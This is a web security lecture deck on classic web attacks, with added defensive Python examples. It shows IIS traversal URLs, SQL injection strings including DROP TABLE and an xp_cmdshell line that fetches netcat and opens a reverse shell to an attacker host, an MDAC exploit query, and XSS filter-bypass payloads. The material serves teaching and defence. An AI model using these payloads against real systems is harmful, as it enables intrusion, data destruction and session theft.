Network Security Part II: Attacks. Web Attacks

Posted on 26-Dec-2015


Overview

• Web Architecture
• Web Hack Attacks

Web Architecture

• Web applications are important and this importance is accelerating

• Web applications are complex and this complexity is accelerating

This is Not New

• Problems with web applications are the same problems as with standalone applications

Why Target the Web

• Everyone is using it
• Safe bet the protocol will not become obsolete anytime soon
• New technology is being implemented/retrofitted on top (e.g. SOAP, WebDAV)
• It's everywhere! Mobile phones, cars, watches, toasters…
• Protocol fundamentally not suited to do a majority of what it's doing today

The Trouble with HTTP

• Multitude of involved technologies
• The involved protocols are extremely simple; therefore, it is easy to (mis)code services on your own HTTP server
• Lack of experience coding public-service-type, multi-user applications
• Stateless nature makes transaction-based systems tricky

How Did We Get Here?

• Unskilled/robotic programmers ("code mills")
• Lack of security-oriented programming training
• Tendency to 'code now, fix later'
• Current tools make it very easy to code insecurely
• Misconceptions about what 'security' really involves

Trouble-Prone Areas of the Web

• Buffer overflows
  – Classic bug that's been exploited for quite a while
  – Lack of bounds-checking in the language a majority of web applications are written in, combined with poor programming practice
  – Can exist in the web server, application server, database server, or the CGI programs
  – Fortunately it's a well-advertised problem
  – Many scripting languages (ASP, PHP, Perl, .NET, etc.) are generally immune, as their strings grow automatically; the interpreters, web servers and native extensions underneath them are still C code and are not

Trouble-Prone Areas of the Web

• Cross-site scripting
  – Reprinting user data without filtering it for web-specific characters
  – Potential to trick users into executing JavaScript in the vulnerable site's context
  – Partly a 'social engineering' technique
  – More of a liability than a vulnerability: it's a way to hack the users, not the server

Trouble-Prone Areas of the Web

• SQL tampering
  – Web server already has/allows access to the database server
  – Attacker can cause arbitrary SQL to be executed
  – Results vary from data exposure to full system compromise
  – Does not require direct database access!
  – Many applications are vulnerable
  – Stems from CGIs/scripts making assumptions about user input and not double-checking/filtering it

Trouble-Prone Areas of the Web

• File includes
  – It's common for a CGI to open and display or manipulate the contents of a file on the server
  – If the filename is composed of user-supplied elements, an attacker may be able to trick the server into opening another file
  – Can lead to info disclosure or script or command execution

Trouble-Prone Areas of the Web

• Authentication weaknesses
  – CGIs can fail to check credentials with every request
  – Thus you bypass the login script and directly access the following scripts, without needing a username/password
  – Or, certain actions/functions may not check for the proper authentication

Trouble-Prone Areas of the Web

• Weak session mechanism
  – The session/state mechanism uses predictable token IDs
  – Or, the ID keyspace is too small for the number of users
  – Either way, an attacker can 'guess' a valid token and hijack the session

Mid-Range E-Commerce Roll-Out

• Web Server
• Application Server
• Database Server
• … and a Firewall
• Maybe some options…
  – Load Balancer
  – Reverse Proxy servers
  – Cache systems

Typical Web Application Set-Up

[Diagram: the web client sends an HTTP request (cleartext or SSL) through the firewall to the web server (Apache, IIS, Netscape, etc.). The web server hands the request to web app plugins (Perl, C/C++, JSP, etc.), which reach the SQL database over a database connection (ADO, ODBC, etc.). The HTTP reply carries HTML, JavaScript, VBScript, etc. back to the client.]

Traditional Hacking

• Targeted against vulnerabilities in OS components and network services
  – Buffer overflows
• Not portable; attacks specific to operating system architecture, authentication, services, etc.
• Myriad of exploits for different services, OS platforms, CPU architectures, etc.
• Requires specialized coding skills such as writing shell-code for buffer overflows, etc.
• In short, it is a complex activity with a limited practitioner base.

    ...
    winsock_found:
        xor  eax, eax
        push eax                 ; protocol = 0
        inc  eax
        push eax                 ; type = 1 (SOCK_STREAM)
        inc  eax
        push eax                 ; af = 2 (AF_INET)
        call socket              ; socket(AF_INET, SOCK_STREAM, 0)
        cmp  eax, -1             ; INVALID_SOCKET?
        jnz  socket_ok
        push sockerrl
        push offset sockerr
        call write_console
        jmp  quit2
    socket_ok:
        mov  sock, eax
        mov  sin.sin_family, 2   ; AF_INET
        mov  esi, offset _port
    ...

Limitations of Traditional Hacking…

• Modern network architectures are getting more robust and secure.
• Firewalls are used in almost all network roll-outs.
• OS vendors are learning from past mistakes (?) and coming out with patches rapidly.
• Increased maturity in coding practices.

Utility of Firewalls

[Diagram: the same set-up as before. Attacks on OS network services (wu-ftpd, Sun RPC, NT ipc$, …) are stopped at the firewall, which limits traditional hacking.]

Utility of Firewalls

[Diagram: the internal back-end application and database servers sit on a non-routable IP network (private addresses), so they cannot be reached directly from outside.]

Utility of Firewalls

[Diagram: outbound access from the web server is restricted at the firewall. Why would a web server telnet out?]

Futility of Firewalls

• Web traffic is the most commonly allowed of any protocol through enterprise firewalls.
• HTTP is perceived as friendly traffic.
• Why lay siege to the wall when you have an open door?
• Attacks based on content/applications are still viewed by some as rare.

Tools Required for Web Hacking

• A web browser
• An Internet connection
• … a clear mind and some spare time!

A Classification of Web Hacks

• Web attacks fall under the following general categories:
  – Buffer overflow attacks
  – SQL injection attacks
  – Input validation attacks
  – URL interpretation attacks
  – Impersonation attacks

Firewalls Cannot Prevent…

[Diagram: web client to web server, through the firewall.]

• Web server misconfiguration
• Complexity mismanagement
• Indifference

Attack the Architecture

[Diagram: how the web server dispatches a request by file extension. The html handler returns the file with a text/html header. The shtml handler processes SSI tags (#exec, #include), which can run /bin/sh or include a file, then returns text/html. The jsp handler processes JSP tags, runs the Java compiler to produce a class, and executes it in the Java Runtime. The cgi handler executes the script (sh, Perl, …) and returns its output. The default handler returns the file as-is; an unknown extension (??) falls through to it.]

Web Server Architecture Attacks

• Complex web server architectures can lead to implementation vulnerabilities.
• A common attack is to bypass the web server configuration directives and invoke the built-in procedures directly.
• A close look at the web server architecture can reveal security problems.

Architecture Misconfigurations

• Handler Forcing:
  – Certain misconfigurations allow handlers to be forced onto files that are not supposed to be processed by them.
  – Forcing a default handler onto a CGI file can cause the contents of the CGI file to be returned "as-is".
  – Forcing a JSP handler onto an HTML file can cause the contents of the HTML file to be compiled by the Java compiler and executed by the Java run-time machine.

JSP Handler Forcing

[Diagram: the JSP handler is forced onto .html files. Instead of the html handler returning the file with a text/html header, the file is page-compiled, processed for JSP tags, run through the Java compiler into a class and executed in the Java Runtime.]

Firewalls Cannot Prevent…

[Diagram: web client to the web apps behind the firewall; poor checking of user inputs.]

• Input validation attacks
• URL interpretation attacks

URL Interpretation Attacks

• Several well-known vulnerabilities in Windows NT and Internet Information Services dating from Autumn 2000 have been wrapped into a common definition: "The Unicode Bug."
• URL parsing vulnerability.
• Improper handling of illegal Unicode sequences.
• Allows remote users to execute arbitrary commands on the web server in the context of IUSR.
• Can lead to potential Administrator-level access.

The IIS Unicode Bug

• Exploit: http://10.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
  – attacker could view a directory listing of the server's C:\ drive
• %c0%af is an overlong (non-shortest-form) UTF-8 encoding of "/". IIS ran its "../" traversal check before decoding the sequence, then decoded it afterwards, so the check never saw the traversal.
• Can use HTTP POST to send multiple commands at a time to cmd.exe.

Web Hacking for Collateral Damage

• Web hacking can result in three types of collateral damage:
  1. Information disclosure (paths etc.): arbitrary file content and source code leakage
  2. Data disclosure (i.e. return all rows)
  3. Arbitrary command execution

Source Code Disclosure

"Use the Source, Luke!"

• WebLogic / WebSphere "JSP" bug (1)
  – Ability to retrieve source code of JSP/JHTML files.
  – Using uppercase "JSP" in the URL causes the server to return unparsed JSP code.

(1) Discovered by Shreeraj Shah, Foundstone.

A Classic Case of "Handler Mismatch"

[Diagram: WebLogic Server dispatch. A request for index.jsp goes to the jsp handler (process JSP tags, Java compiler, Java Runtime). A request for index.JSP matches none of the *.jsp, *.jhtml, *.shtml or html registrations, so it falls through to the default file handler, which returns the raw source; on the file system index.JSP = index.jsp.]

weblogic.httpd.register.file=weblogic.servlet.FileServlet
weblogic.httpd.register.*.shtml=weblogic.servlet.ServerSideIncludeServlet
weblogic.httpd.register.*.jhtml=weblogic.servlet.jhtmlc.PageCompileServlet
weblogic.httpd.register.*.jsp=weblogic.servlet.JSPServlet

HTTP Request: index.JSP

More Source Disclosure

• URL prefixes for source code disclosure (1):
  – /servlet/file/ (IBM WebSphere)
  – /file/ (BEA WebLogic)
  – /*.shtml/ (BEA WebLogic)
  – /ConsoleHelp/ (BEA WebLogic)
  – /servlet/com.sun.server.http.servlet.FileServlet/ (Sun JavaWebServer)

(1) Advisories located on: http://www.foundstone.com/advisories.htm

… I Thought it was Functionality

• IIS "+.htr" bug
  – View source code of ASP/ASA files.
  – URL interpretation vulnerability.

http://10.0.0.1/global.asa+.htr

  – ".htr" causes ISM.DLL to handle the URL.
  – Characters after the "+" sign (space) are ignored.

Doom on You…

    <SCRIPT LANGUAGE="VBScript" RUNAT="Server">
    Sub Application_OnStart
       Set Db = Server.CreateObject("Commerce.DbServer")
       Db.ConnectionString = "DSN=trans.db;UID=sa;PWD=n0t4u2c"
       Db.Application = "http://10.1.1.16/"
       Set Application("Db") = Db
    End Sub
    Sub Session_OnStart
       '==Visual InterDev Generated - DataConnection startspan==
       '--Project Data Connection
       Session("DataConn_ConnectionString") = "DSN=CertSrv;DBQ=C:\WINNT2\System32\CertLog\certsrv.mdb;DriverId=25;FIL=MS Access;MaxBufferSize=512;PageTimeout=5;"
       Session("DataConn_ConnectionTimeout") = 15
       Session("DataConn_CommandTimeout") = 30
       Session("DataConn_RuntimeUserName") = ""
       Session("DataConn_RuntimePassword") = ""
       '==Visual InterDev Generated - DataConnection endspan==
    End Sub
    </SCRIPT>

User ID: sa
Password: n0t4u2c

More Source Disclosure

• Some applications access files without appropriate checking.
• Input validation vulnerability.
• No checking performed for file type or location.
• Filenames can be manipulated via parameters passed on the URL or as hidden fields.

NT IIS Showcode.asp Vulnerability

• Active Server Page (ASP) script installed by default on Microsoft's Internet Information Server (IIS) 4.0
• Gives remote users access to view any file on the same volume as the web server that is readable by the web server.

http://www.someserver.com/msadc/Samples/SELECTOR/Showcode.asp?source=/msadc/Samples/../../../../../boot.ini

Firewalls Cannot Prevent…

[Diagram: input validation attacks pass through the firewall to the web apps and extend the SQL statements sent to the SQL database; URL interpretation attacks hit the web server.]

• SQL Query Poisoning

SQL Query Poisoning

• Poor input validation on parameters passed to SQL queries can be disastrous.
• Return all rows: http://10.0.0.3/showtable.asp?ID=3+OR+1=1
• Resultant query: SELECT * FROM PRODUCT WHERE ID=3 OR 1=1
• Drop table: http://10.0.0.3/showtable.asp?ID=3%01DROP+TABLE+PRODUCT
• Resultant query: SELECT * FROM PRODUCT WHERE ID=3 DROP TABLE PRODUCT

SQL Query Poisoning

• Remote command execution!
  http://10.0.0.3/showtable.asp?ID=3%01EXEC+master..xp_cmdshell+'tftp+-i+10.0.0.13+GET+nc.exe+%26%26+nc+-e+cmd.exe+10.0.0.11+2000'
• Command executed: tftp -i 10.0.0.13 GET nc.exe && nc -e cmd.exe 10.0.0.11 2000
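The following is an added example, not code from the slides, showing the showtable.asp flaw and its fix side by side. It assumes an in-memory SQLite database with a constructed three-row PRODUCT table (the slides never show the real schema); SQLite's sqlite3 module executes only one statement per call, so the DROP TABLE and xp_cmdshell variants above cannot be reproduced in it, but the tautology and a UNION against the schema catalogue are enough to show that the attacker, not the developer, now writes the query:

```python
import sqlite3

# Constructed rows standing in for the PRODUCT table behind showtable.asp.
PRODUCTS = [(1, "widget"), (2, "gadget"), (3, "gizmo")]


def make_db():
    """In-memory SQLite database seeded with the constructed PRODUCT rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE PRODUCT (ID INTEGER PRIMARY KEY, NAME TEXT)")
    con.executemany("INSERT INTO PRODUCT VALUES (?, ?)", PRODUCTS)
    con.commit()
    return con


def show_table_vulnerable(con, product_id):
    """What showtable.asp does: the ID parameter is pasted into the SQL text,
    so whatever follows the number becomes part of the query."""
    sql = "SELECT * FROM PRODUCT WHERE ID=" + product_id
    return con.execute(sql).fetchall()


def show_table_parameterized(con, product_id):
    """Hardened form: the value is bound as a parameter and never parsed as SQL.
    '3 OR 1=1' is compared with the ID column as one string and matches nothing."""
    return con.execute("SELECT * FROM PRODUCT WHERE ID=?", (product_id,)).fetchall()


def is_valid_id(product_id):
    """Default-deny input check: an ID is a string of decimal digits, nothing else."""
    return product_id.isdigit()


def show_table_validated(con, product_id):
    """Both layers: reject anything that does not look like an ID, then bind it."""
    if not is_valid_id(product_id):
        raise ValueError("ID must be a decimal integer")
    return show_table_parameterized(con, int(product_id))


def demo():
    """Run the honest request and two poisoned ones through both code paths."""
    con = make_db()
    honest = "3"
    tautology = "3 OR 1=1"                                  # ID=3+OR+1=1 after URL decoding
    union = "0 UNION SELECT name, sql FROM sqlite_master"   # read the schema instead of a product
    return {
        "vuln_honest": show_table_vulnerable(con, honest),
        "vuln_tautology": show_table_vulnerable(con, tautology),
        "vuln_union": show_table_vulnerable(con, union),
        "param_honest": show_table_parameterized(con, honest),
        "param_tautology": show_table_parameterized(con, tautology),
        "param_union": show_table_parameterized(con, union),
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(f"{label:16s} {rows}")
```

The parameterized query alone stops the injection; the digit check in front of it is what turns a silent empty result into a logged rejection, which is the "log all filter violations" advice given later in these slides.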

SQL Remote Commando

[Diagram: (1) the attacker's web browser sends the poisoned request to IIS/ASP, which passes SELECT * FROM PRODUCT WHERE ID=3 EXEC master..xp_cmdshell 'tftp -i 10.0.0.13 GET nc.exe && nc -e cmd.exe 10.0.0.11 2000' to the database; (2) the NT IIS box pulls nc.exe from the attacker's tftp server; (3) nc connects back to the attacker's listener, which receives a C:\> prompt.]

Firewalls Cannot Prevent…

[Diagram: the same set-up, now also showing reverse engineering of HTTP cookies and HTTP session hijacking alongside input validation attacks, SQL query poisoning and URL interpretation attacks.]

• Impersonation

Firewalls Cannot Prevent…

[Diagram: the typical web application set-up again (client, firewall, web server with Perl/C/C++/JSP plugins, ADO/ODBC connection, SQL database).]

• Application bugs

The MDAC Attack

• Vulnerability in Microsoft Data Access Components (msadcs.dll).
• MDAC allows remote users to perform SQL queries without authentication.
• Only the DSN needs to be known.
• SQL queries can be crafted to execute arbitrary commands.

The MDAC Attack

[Diagram: Remote Data Service components. Client: Internet Explorer or VB.exe, using the RDS Data Control and RDS Data Space. Server: IIS with msadcs.dll exposing the RDS Data Factory and custom business objects; behind them ASP (ADO), the ODBC provider and the Jet 3.5 provider over OLE DB. Requests travel as URLs, results come back as HTML.]

The MDAC Attack

• Exploit (the query and DSN built by the Perl exploit; $command is the attacker's command, and $p1/$p2 supply the drive letter and Windows directory of the sample database path):

    $query = "Select * from Customers where City='|shell(\"$command\")|'";
    $dsn = "driver={Microsoft Access Driver (*.mdb)};dbq=" . $p1 . ":\\" . $p2 . "\\help\\iis\\htm\\tutorial\\btcustmr.mdb;";

• Gain Administrator privileges on NT!

The MDAC Attack in Action

[Diagram: (1) mdac.pl (the exploit) sends SELECT * FROM Customers WHERE City = '|shell($command)|' to msadcs.dll on IIS 4.0; (2) the NT IIS box pulls nc.exe from the attacker's tftp server; (3) nc connects back to the attacker's listener, which receives a C:\> prompt.]

The Effectiveness of Web Hacking

• By default ports 80 and 443 are usually allowed through firewalls. The open door…

• A single URL string is able to be processed by many different components.

• In most cases the only defense is reliance on secure coding.

Missile of Death

[Diagram: one request hits every tier (web server, web apps, database) behind the firewall. The URL is spaced out below to show the pieces that different components interpret: scheme, host, directory, script, and each query parameter.]

http: // 10.0.0.1 / catalog / display.asp ? pg = 1 & product = 7

Cross-Site Scripting: Why You Should Care

• XSS is not an attack on the server; it is an attack on the users of your application
• So what?
  – Identity theft
  – User masquerading
  – Reputation risk

Cross-Site Scripting (XSS)

• Found in 98% of applications
• 2 main types
  – Transient (URL based): http://badapp.com/error.jsp?msg=<SCRIPT>alert("Test");</SCRIPT>
  – Sticky: script placed in a static bit of web content

XSS continued…

• Transient generally requires user interaction
• What can happen?
  – Possibilities are only restricted by the client
  – Cookie theft is the most common example
• "But I filter '<' and '>'"
  – JScript entities: "&{alert('Test')};"

Session Hijacking

•HTTP is stateless so application designers must build a way to track state

•Cookies and URL strings are the most common ways to track state

•Both are easily exploitable

Session Hijacking Continued…

•Generally the next thing to occur after XSS

•Examples of common session tracking issues

Parameter Tampering

• Programmers will store data anywhere!
  – URL parameters: http://badapp.com/checkout.pl?p=$1.00
  – Cookies: Cookie: p=$1.00
  – Hidden fields: not really hidden

Unbound File Calls

• Ye olde ../../
• Becomes an issue when the display of important information (global.asa) is possible
• Most application languages will take URLs as file arguments

Do You Know Where Your Data Is?

• Building an exclusionary filter is difficult because your data is all over the place

Data Flow Example

[Diagram: input from the Internet reaches www.hackme.com and flows on into the Customer Service database, the Marketing database and the Orders database.]

Designing a Proper Filter

•Make all filters default deny– Don’t try to exclude “bad stuff”

•Requires a good idea where your data is going

•Log all filter violations

Filter Bypassing is a Technique to Evade Detection by Filtering Systems

• Filter bypassing techniques come in many varieties when applied to the many facets of web application security.

• The general idea of performing the various techniques described is to successfully bypass security measures designed to prevent certain types/amounts/values of data from being passed into a given system.

• Many of the described techniques can be highly effective when used properly and even become more powerful when used in combination.

Most Filter Systems Are Very Simple

Seven forms of ingenuity:
• URL Encoded Strings
• Double Hex Encoding
• Unicode Encoded Strings
• Long URLs
• Case Sensitivity
• XSS Filter-Bypass Manipulation
• Null Character Injection

The Hex Advantage

By URL hex-encoding URL strings, it may be possible to circumvent filter security systems and IDS that match on the raw request.

http://foo.com/cgi?file=/etc/passwd

Can become:

http://foo.com/cgi?file=%2F%65%74%63%2F%70%61%73%73%77%64

Double Hex Encoding

• In September 2001, the Nimda worm spread throughout the Internet taking advantage of a Microsoft IIS vulnerability.

• The vulnerability was called an Escaped Character Decoding Vulnerability, which involves double hex encoding of a URL.

• An attacker or automated script would craft a URL so that it contained special hex-encoded sequences to exploit a vulnerability.

• When an un-patched, vulnerable Microsoft IIS server received the encoded URL, one round of hex decoding was performed on the path in the URL.

• IIS then performed a security check on the decoded URL, but afterwards performed a second round of hex decoding.

• This secondary decoding was the source of another Vulnerability.

IIS Double Hex

Round 1 decoding:
  scripts/..%255c../winnt
becomes:
  scripts/..%5c../winnt    (%25 = "%" character)

Round 2 decoding:
  scripts/..%5c../winnt
becomes:
  scripts/..\../winnt

Directory path traversal is now possible using path obfuscation through double hex encoding.

The Unicode Slash

• "%c0%af" is an overlong UTF-8 encoding that a lenient decoder accepts as the equivalent of a slash ("/").
• Therefore the common IIS URL exploit:
  scripts/..%c0%af../winnt
• becomes:
  scripts/../../winnt

Once again, directory path traversal is possible using path obfuscation through Unicode.

Double Slash

• Double Slash: using multiple directory slashes in URLs. For example: http://www.foo.com/..//etc//passwd
• Can be used to move under the radar of IDS systems and still function properly.

Long URLs

• Many systems put limits on how much data a variable can store or a system can handle.
• Often, if these limits are exceeded, the data will still be used but bypass certain security considerations.
• URLs such as: http://www.foo.com/cgi?param=filename
• Replaced with: http://www.foo.com/cgi?param=<2K_of_Data>

Case Sensitivity

• Case sensitivity may play a role in many security filtration systems.
• Alternating case on URL parameters may be used to bypass certain restrictions.

http://foo.com/cgi?param=bar
http://foo.com/cgi?param=BaR
http://foo.com/CGI?param=BAR

Method Switching

• Many web applications do not properly perform HTTP Request Method sanity checking.

• Performing Method Switching can be used to bypass IDS, logging features and CGI security mechanisms.

• Most web servers do not log "POST" data and thus forensic analysis is harder to perform.

The Request Method: GET /cgi-bin/some.cgi

can become: POST /cgi-bin/some.cgi

The Method token indicates the method to be performed on the resource identified by the Request-URI.

HTTP 1.1 Methods

• OPTIONS
• GET
• HEAD
• POST
• PUT
• DELETE
• TRACE
• CONNECT

Using your "HEAD"

• The “HEAD” request method can be used to determine if a particular HTTP resource is accessible without actually downloading the resource data.

Scans and web application attacks can be made to be more effective using this technique.

Null Character Injection

• Hex-encoded null characters can be used to thwart some security mechanisms.
• This happens because in the "C" programming language a null character designates the end of a string.
• So if a CGI appends ".html" to an input parameter, then:
  http://foo.com/cgi?file=../../etc/passwd%00
• will cut off the appended ".html" when the name reaches the C library.
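The following added example (mine, not from the slides) puts The Hex Advantage, Double Hex Encoding and Null Character Injection side by side in one small file-serving handler. It assumes a hypothetical CGI that appends ".html" to a file parameter under an assumed document root of /var/www, checks the once-decoded path for "../" and then, as IIS did, decodes a second time before use; raw_ids_alerts() models a signature IDS that matches the bytes on the wire. Python's urllib rejects the overlong %c0%af sequence, which is exactly the behaviour IIS lacked, so the Unicode slash is not reproducible here. safe_open() shows the fix: canonicalise once, refuse anything a second decode would still change, refuse NULs, and validate the final path.

```python
import posixpath
from urllib.parse import unquote

WEBROOT = "/var/www"                       # assumed document root for the demo
IDS_SIGNATURES = ("/etc/passwd", "cmd.exe")


def raw_ids_alerts(request_path):
    """Signature matching on the request as sent, the way a naive IDS or
    filter does: one round of %XX encoding is enough to slip past it."""
    return any(sig in request_path for sig in IDS_SIGNATURES)


def naive_open(request_path):
    """Emulates the decode-check-decode ordering behind the IIS double-hex
    bug in a CGI that appends '.html' and hands the name to C code.
    Returns the filesystem path that would really be opened, or None when
    the (too early) traversal check blocked the request."""
    once = unquote(request_path)
    if "../" in once:                       # the check runs on the once-decoded path...
        return None
    twice = unquote(once)                   # ...then the path is decoded a second time
    target = twice + ".html"                # 'only .html files can be requested'
    target = target.split("\x00", 1)[0]     # open(2) reads a C string: it stops at NUL
    return posixpath.normpath(WEBROOT + "/" + target)


def safe_open(request_path):
    """Canonicalise first, validate last. Decode exactly once, refuse input
    that a second decode would change (double encoding), refuse NULs, then
    normalise the full path and require that it still lies under WEBROOT."""
    decoded = unquote(request_path)
    if unquote(decoded) != decoded:
        return None                         # double (or deeper) encoding
    if "\x00" in decoded:
        return None
    target = posixpath.normpath(posixpath.join(WEBROOT, decoded.lstrip("/") + ".html"))
    if not target.startswith(WEBROOT + "/"):
        return None                         # escaped the document root
    return target


if __name__ == "__main__":
    for p in ("docs/readme", "../../../etc/passwd",
              "..%252f..%252f..%252fetc%252fpasswd", "..%252f..%252f..%252fetc%252fpasswd%2500",
              "secret%00"):
        print(f"{p:45s} naive={naive_open(p)!s:22s} safe={safe_open(p)}")
```

The price of safe_open() is that a legitimate filename containing a literal "%xx" is rejected too; that is the default-deny trade-off the filter design slide asks for, and such a request should be logged rather than guessed at.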

Unicode (UTF-8) Encoded

• Unicode is a universal way to represent characters.

• However, unicode can also be used to circumvent security mechanisms by representing information in another fashion.

• Microsoft IIS has had security issues in the past while supporting unicode.

URL Encoded String

• The specification for URLs (RFC 1738, Dec. '94) poses a problem in that it limits the use of allowed characters in URLs to only a limited subset of the US-ASCII character set:

• "...Only alphanumerics [0-9a-zA-Z], the special characters "$_.+!*'()," [not including the quotes - ed], and reserved characters used for their reserved purposes may be used unencoded within a URL."

XSS Filter-Bypass Manipulation

• This technique is used pass various types of client-side scripting language through implemented security filters.

• The idea is to be able to achieve client-side execution of a client-side script.

• There are several techniques used to perform this attack.

Hammer the Filters

•Submit all the raw HTML tags you can find, and then view the output results.

•Combine HTML with tag attributes, such as SRC, STYLE, HREF and OnXXX (JavaScript Event Handler).

•This will show what HTML is allowed, what the changes were, and possible dangerous HTML that can be exploited.

SRCing the Protocol

•Using the “javascript” protocol in an HTML source attribute.

<IMG SRC="javascript:js_expression">

<IMG SRC="javascript:alert('test');">

Alternate Protocol SRCing

• Same technique as the previous; however, using the protocols "livescript" and "mocha" will yield the same effect.

<IMG SRC="livescript:js_expression">

<IMG SRC="mocha:alert('test');">

Decimal HTML Entities

• Variation on the previous techniques: decimal HTML entities placed between the protocol characters can be used to bypass filters yet still execute JavaScript.

<IMG SRC="java&#010;script:js_expression">

• \09 \10 \11 \12 \13 have all been seen to work

Hex HTML Entities

• Another variation on the previous example: hex HTML entities may also be used to bypass filter restrictions yet execute JavaScript.

<IMG SRC="java&#X0A;script:js_expression">

Padding HTML Entities

• Padding HTML entities with "0"s may also be used to bypass the filters yet still execute JavaScript.

<IMG SRC="java&#000009;script:js_expression">

STYLE JavaScript Type

• Changing the MIME type on a "style" tag may be used to execute JavaScript.

<style TYPE="text/javascript">JS EXPRESSION</style>

<style TYPE="text/javascript">alert(document.domain);</style>

STYLE JavaScript X-Type

•Variation on the previous example, but by using the “application/x-javascript” MIME-TYPE, the filters may be bypassed.

<STYLE TYPE="application/x-javascript">

alert('JavaScript has been Executed');

</STYLE>

STYLE JavaScript Import

•Using the @import feature in CSS may be used to perform JavaScript protocol SRCing.

<style TYPE="text/css">

@import url(javascript:alert('Javascript is executed'));

</style>

STYLE URL Import

•Using the @import feature in CSS can also be used to import JavaScript from another HTTP resource.

<STYLE type=text/css>

@import url(http://www.test.com);

</STYLE>

LINK Style Sheet

•The “LINK” tag can be used to import JavaScript from a remote HTTP resource.

<LINK REL=STYLESHEET TYPE="text/javascript" SRC="javascript_path.js">

Style Left Expression

• A few CSS features used together to execute JavaScript.

<P STYLE="left:expression(eval('alert(\'JavaScript is executed\');window.close()'))">

Remote SRCing

• A few HTML tags, such as "LAYER", "ILAYER", "FRAME" and "IFRAME", can be used to src in JavaScript from remote resources.

<LAYER SRC="js.html"></LAYER>

… AND CURLY

<IMG SRC="&{javascript_expression};">

<IMG SRC="&{alert('alert')};">

• Syntax must be exact.

Dangerous HTML Tags

• "All HTML is to be considered dangerous, but these tags are the most insidious."
  – <APPLET>
  – <BODY>
  – <EMBED>
  – <FRAME>
  – <FRAMESET>
  – <HTML>
  – <IFRAME>
  – <IMG>
  – <LAYER>
  – <ILAYER>
  – <META>
  – <OBJECT>
  – <SCRIPT>
  – <STYLE>

Dangerous HTML Attributes

• (HTML tags with these attributes.)
  – SRC
  – LOWSRC
  – STYLE
  – HREF
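The following is an added example, not code from the slides, contrasting the exclusionary "strip what I know is bad" filter with the default-deny approach recommended earlier on this page. The payloads are the evasions listed above (re-typed, not captured from a live site); everything else is my construction. escape_output() is the right answer whenever user data is meant to be text; AllowlistSanitizer is for the rarer case where a few tags must survive, and its key property is that it judges attribute values only after the HTML parser has decoded entities, so java&#010;script: is seen for what it is:

```python
import html
import re
from html.parser import HTMLParser

# Evasion strings taken from the slides above (re-typed, not live captures).
SLIDE_PAYLOADS = [
    '<SCRIPT>alert("Test");</SCRIPT>',
    '<IMG SRC="javascript:alert(\'test\');">',
    '<IMG SRC="java&#010;script:alert(1)">',
    '<IMG SRC="jAvAsCrIpT:alert(1)">',
    '<IMG SRC="&{alert(\'alert\')};">',
    '<STYLE TYPE="text/javascript">alert(document.domain)</STYLE>',
    '<P STYLE="left:expression(alert(1))">',
]


def denylist_filter(text):
    """The exclusionary filter the slides warn against: remove the strings
    the author happens to know are bad and pass everything else through."""
    for bad in ("<script", "</script", "javascript:"):
        text = re.sub(re.escape(bad), "", text, flags=re.IGNORECASE)
    return text


def escape_output(text):
    """Default deny for the common case: user data is text, so every
    markup-significant character is encoded on output. Nothing becomes a tag."""
    return html.escape(text, quote=True)


ALLOWED_TAGS = {"b", "i", "p", "br", "a"}
ALLOWED_ATTRS = {"a": {"href"}}
SAFE_SCHEMES = ("http://", "https://")


class AllowlistSanitizer(HTMLParser):
    """For the case where some HTML must be allowed: parse it, keep only
    allow-listed tags and attributes, and decide on attribute values after
    entity decoding and whitespace stripping, not on the raw bytes."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return                           # tag dropped; any text inside still goes via handle_data
        kept = ""
        for name, value in attrs:            # HTMLParser has already decoded &#010; etc. here
            if name not in ALLOWED_ATTRS.get(tag, set()) or value is None:
                continue
            canonical = "".join(value.split()).lower()   # collapse the \t \n \r tricks
            if canonical.startswith(SAFE_SCHEMES):
                kept += f' {name}="{html.escape(value, quote=True)}"'
        self.out.append(f"<{tag}{kept}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(html.escape(data, quote=True))


def sanitize(text):
    """Run text through the allow-list sanitizer and return the cleaned HTML."""
    parser = AllowlistSanitizer()
    parser.feed(text)
    parser.close()
    return "".join(parser.out)


if __name__ == "__main__":
    for p in SLIDE_PAYLOADS:
        print(f"{p}\n  denylist:  {denylist_filter(p)}\n  escaped:   {escape_output(p)}\n  allowlist: {sanitize(p)}")
```

Note what the denylist misses: the entity-split SRC and the "&{...}" form pass through untouched because neither contains the literal strings it looks for, which is the point made under "But I filter '<' and '>'".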

Web Application Logins

Traditional Brute Force

• guest
• Admin
• 123123
• Password
• Etc.

Session ID Overview

• HTTP is a stateless protocol
• Rather than make a user authenticate upon each click in a web application, a sense of "state" is created
• In order to maintain state, a shared string, token, or secret between HTTP client and server is usually used by developers
• Essentially, authentication data (username/password) is exchanged for a "Session ID"

Web State Attacks

• Session Replay
  – A traditional replay attack in the cryptography sense is an attack in which a valid data transmission is maliciously or fraudulently repeated, either by the originator or by an adversary who intercepts the data and retransmits it.
• Session Hijacking
  – Seizing control of a legitimate user's web application session while that user is "logged in" to the application

Session ID

• Session ID should IN THEORY be just as secure as username/password

Session ID Overview

• While it is generally clear that username/password pairs are indeed authentication data and therefore sensitive, it is not generally understood that session IDs are also just as sensitive because of their frequent use for authentication. See RFC 2964 (Use of HTTP State Management).

Session ID Overview

• Session IDs are commonly stored in cookies and/or URLs, and hidden fields of web pages (or some combination)
• Session ID generated by the WEB SERVER (IIS, etc.) when the user first hits the site, or by the WEB APPLICATION (ATG Dynamo, Apache Tomcat, BEA WebLogic, .jsp, .asp, Perl, etc.) when the user logs in

Cookie Refresher

• Sometimes the cookies are set to expire (i.e., be deleted) upon closing the browser; these are typically called “session cookies” or “non-persistent” cookies

• Persistent cookies last beyond a user’s session (i.e. “Remember Me” option)

• Persistent cookies are usually stored on the user’s hard drive in a location according to the particular operating system and browser (e.g. , C:\Program files\netscape \users\username\cookies.txt for Netscape and C:\Documents and Settings \username\Cookies for IE on Win2K).

Cookie Refresher (cookie semantics per RFC 2965; the line below is in the Netscape cookies.txt file layout)

www.redhat.com FALSE / FALSE 1154029490 Apache 64.3.40.151.16018996349247480
      1          2    3   4       5         6                 7

1.) domain: The website domain that created and that can read the variable.
